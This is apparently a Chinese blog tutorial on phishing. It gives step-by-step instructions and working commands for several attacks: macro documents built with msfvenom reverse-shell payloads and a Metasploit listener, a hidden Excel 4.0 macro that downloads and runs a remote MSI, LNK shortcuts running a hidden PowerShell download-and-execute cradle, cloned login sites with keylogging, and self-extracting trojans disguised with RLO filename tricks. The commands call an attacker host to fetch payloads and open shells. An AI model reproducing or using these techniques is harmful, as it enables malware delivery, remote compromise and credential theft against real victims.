钓鱼的常见几种方式

钓鱼的多种方式

office钓鱼攻击

宏与宏病毒

# 宏
宏是office自带的一种高级脚本特性，通过VBA代码，可以在office中去完成某项特定的任务，而不必再重复相同的动作，目的是让用户文档中一些任务自动化

# 宏病毒
宏病毒是一种寄存在文档或模板的宏中的计算机病毒，打开这中文档，其中的宏就会被执行，宏病毒被激活，转移到计算机上

docx钓鱼攻击

# word远程模板执行宏
利用word文档加载附加模板是的缺陷所发起的恶意请求而达到的攻击目的，所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式，然后加载模板执行恶意模板的宏


# 攻击方法
1，创建两个不同的文件，第一个是启用宏的模板，或是.dotm文件，他将包含恶意VBA宏。

2，创建第一个文件，不包含恶意代码，但是有指向恶意模板文件的目标链接,即指向创建的第一个文件的链接

实践操作

• 利用msf生成宏病毒

  msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.110.131 LPORT=4444 -e x86/shikata-ga_nai -i 10 -f vba-exe //会生成两端代码，macro的写在宏代码中 payload的写在word文档中

• 创建一个word注入宏

  创建word（.docm后缀的文件)-点击工具-宏编辑器

• 将msf生成的宏（第一段代码 macro)插入代码中，保存并关闭

• 将生成的payload复制到文档中

• msf端使用监听ip以及端口

  use exploit/multi/handler
  set payload windows/meterpreter/reverse_tcp
  set LHOST 192.168.110.131
  set LPORT 4444
  run
  打开docm文件，并且启用宏s
  之后会弹出meterfer的shell

excel 宏

当把恶意的宏代码嵌入excel中，用户打开excel文件里的宏就会被触发

#攻击方法
1，使用msf生成hack.msi放到远程的服务器上

2，使用excel插入宏

3，将插入的宏隐藏

实践操作

• msf生成excel宏

  msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.110.131 LPORT=4444 -f msi -o hack.msi

• 打开一个excel，右键点击sheet表格-插入-点击宏代码-在新建的宏表中插入宏代码

=EXEC("msiexec /q /i http://192.168.110.131:8000/hack.msi")   //调用执行服务器上的dayu.msi文件
=HALT()      //标识Excel 4.0宏结束，类似C语言return指令
//http://192.168.110.131:8000/hack.msi可以在vps中使用python -m http.server搭建一个网站

• 将单元格设置为Auto_open

• 将宏表进行隐藏

• 保存为xslm文件

• 受害主机点击此文件之后msf端会看到反弹的shell
  

CHM电子书钓鱼

# CHM 已编译的帮助文件
html文件格式被压缩和重整以后，就被制成了这种二进制的。chm扩展文件格式。
.chm文件格式由压缩的html文件、图像、javascript这些文件组合而成，同时，他可能还带有超链接目录、索引以及全文检索功能。


# 电子书木马钓鱼优点
1.因为电子书一般是在本地电脑域打开的，所以获得的权限也是本地电脑域的权限
2。由于木马镶嵌再电子书中，所以一般的杀毒软件无法对其中存在的木马病毒进行检查和清除

# 攻击方法
1，编写恶意代码，制作钓鱼文件（可使用MyJSRat工具）
2，将恶意代码放在服务器上并且监听
3，制作带恶意代码的chm电子书（可使用Easy CHM)

lnk快捷方式钓鱼

# lnk文件
用于指向其他文件的一种文件。这些文件通常称为快捷方式文件，通常他以快捷方式放在硬盘上，方便使用者快速的调用

# 攻击方法
1，使用cs进行web投递生成a脚本http://192.168.110.131:80/a

2.在桌面右键创建快捷方式
目标填写payload（例如：C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.110.131:80/a')"

cs生成payload:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.110.131:80/a'))"

3.为了让快捷方式伪装的像诱导文件，可以选择更改图标，并且更改文件名

实践操作

• 使用cs生成一段ps脚本，意思为远程下载脚本并运行。主机访问后能直接运行，自动下载payload并上线

• 创建快捷方式

• 填写payload并保存为pdf

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.110.131:80/a')"

  cs生成的payload为
  powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.110.131:80/a'))"

  填写的payload最好知名powershell的存在位置

• 右键属性修改图标，图标文件可在**%SystemRoot%\System32\SHELL32.dll**中寻找

• 点击文件之后上线成功

克隆网站钓鱼

克隆网站主要模仿相关网页的页面格式，与原网站类似，且域名相差不大，看到类似的网站一般情况下都会输入账号和密码，同时诱导受害人下载恶意文件，也可以劫持网页，记录键盘输入等操作

# 攻击方法
利用cs克隆网站

# 说明
有些网站可以克隆成功，但是不能得到用户输入的数据

实践操作

• 使用cs克隆想要盗取的网站

• 输入要克隆的网站，记得勾选在克隆的站点启用键盘记录

• 访问生成的网站，并输入用户名密码

• 在cs的视图-web日志可以看到网站的访问情况和输入的用户名和密码

自解压捆绑钓鱼

使用winrar将可执行文件和图片捆绑在一起并添加到压缩文件，创建自解压格式并设置解压后运行，在模式中选择隐藏

实践操作

• 使用cs生成木马，并且将这个木马和图片放在一个文件夹中，选中这两个，右键添加到压缩文件
• 进行自解压

• 来到高级选项-自解压选项-修改解压路径

• 在高级解压选项的设置中选择解压后运行，并设置木马的路径和图片路径（图片名最好简单一点 不要有空格 像我下面图片这样命名最后就解析失败了）

• 在高级解压选项的模式中选择全部隐藏

• 在高级解压选项的更新中选择以下选项

• 将可执行文件的图标改为一张图片（需要将图片转为图标，后缀为.ico可利用在线网站）,在高级解压选项的文本和图标中选择以下选项

• 生成可执行文件

• 运行执行文件会弹出图片
  

• 查看cs上线成功
  

ets%2Fimage-20240821111536856.png&pos_id=img-wKkexOJ9-1724221495137)

• 如果想要更逼真一点可以使用RLO

  1.右键.exe文件重命名
  2，重命名时再右键插入RLO
  4，想要什么后缀，就将后缀名倒着写即可，例如word就是drow,png就是gnp

• 改名后再次点击，仍然上线成功

​